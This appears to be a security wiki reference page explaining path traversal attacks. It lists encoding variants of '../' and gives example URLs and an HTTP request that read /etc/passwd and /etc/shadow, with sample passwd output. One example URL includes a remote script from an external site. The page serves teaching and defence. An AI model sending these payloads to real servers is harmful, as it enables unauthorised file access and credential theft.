Path Traversal

Last revision (mm/dd/yy): //

Description
This attack aims to access files and directories that are stored outside the web root folder. By browsing the application, one should look for absolute links to files stored on the web server. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations, it’s possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control. The idea is to use “../” sequences to move up to root directory, thus permitting to navigate thru file system.

This attack can be executed with an external malicious code injected on the path, like the Resource Injection attack, but it’s a Path Traversal attack.

This attack is also named of “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.

To perform this attack it’s not necessary to use a specific tool, but it’s recommended to use a spider/crawler to detect all URLs available.

Request variations

Encoding and double encoding:

%2e%2e%2f represents ../ %2e%2e/ represents ../ ..%2f represents ../ %2e%2e%5c represents ..\ %2e%2e\ represents ..\ ..%5c represents ..\ %252e%252e%255c represents ..\ ..%255c represents ..\ and so on.

Unicode/UTF-8 Encoding (only for systems support UTF-8 sequences)

..%c0%af represents ../ ..%c1%9c represents ..\

OS specific

UNIX Root directory: “ / “ Directory separator: “ / “

WINDOWS Root directory: “ : \ “ Directory separator: “ / “ or “ \ ”

Severity
High

Likelihood of exploitation
High

Example 1
In order to identify the possibility to execute this attack, it’s needed to observe how the application deals with the resources in use. The following examples show some situations. http://some_site.com.br/get-files.jsp?file=report.pdf http://some_site.com.br/get-page.php?home=aaa.html http://some_site.com.br/some-page.asp?page=index.html

In these examples it’s possible to insert a malicious string as the variable parameter to access files located outside the web publish directory. Ex: http://some_site.com.br/get-files?file=../../../../some dir/some file Or http://some_site.com.br/../../../../some dir/some file

The following URLs show examples of *NIX password file exploitation:

http://some_site.com.br/../../../../etc/shadow http://some_site.com.br/get-files?file=/etc/passwd

Note: In a windows system an attacker can navigate only in a partition that locates web root while in the Linux he can navigate in all disc.

Example 2
It's also possible to include files, and scripts, located on external website, http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php

Example 3
These examples illustrate a case when an attacker make the server show the CGI source code; http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi

Example 4
This example was extracted from: Wikipedia - Directory Traversal

A typical example of vulnerable application code is:



An attack against this system could be to send the following HTTP request: GET /vulnerable.php HTTP/1.0 Cookie: TEMPLATE=../../../../../../../../../etc/passwd

Generating a server response such as: HTTP/1.0 200 OK Content-Type: text/html Server: Apache

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh daemon:*:1:1::/tmp: phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh

The repeated ../ characters after /home/users/phpguru/templates/ has caused include to traverse to the root directory, and then include the UNIX password file /etc/passwd.

UNIX etc/passwd is a common file used to demonstrate directory traversal, as it is often used by crackers to try cracking the passwords.

Absolute Path Traversal

 * The following URLs maybe are vulnerable to this attack:

http://testsite.com/get.php?f=list http://testsite.com/get.cgi?f=2 http://testsite.com/get.asp?f=test


 * A simple way to execute this attack is like this:

http://testsite.com/get.php?f=/var/www/html/get.php http://testsite.com/get.cgi?f=/var/www/html/admin/get.inc http://testsite.com/get.asp?f=/etc/passwd


 * When the web server returns information about errors in a web application, it is much easier for the attacker to guess the correct locations (e.g. path to the file with a source code, which then may be displayed).

Related Threat Agents

 * Category: Information Disclosure

Related Attacks

 * Path Manipulation
 * Relative Path Traversal
 * Resource Injection

Related Vulnerabilities

 * Category:Input Validation Vulnerability

Related Controls

 * Category:Input Validation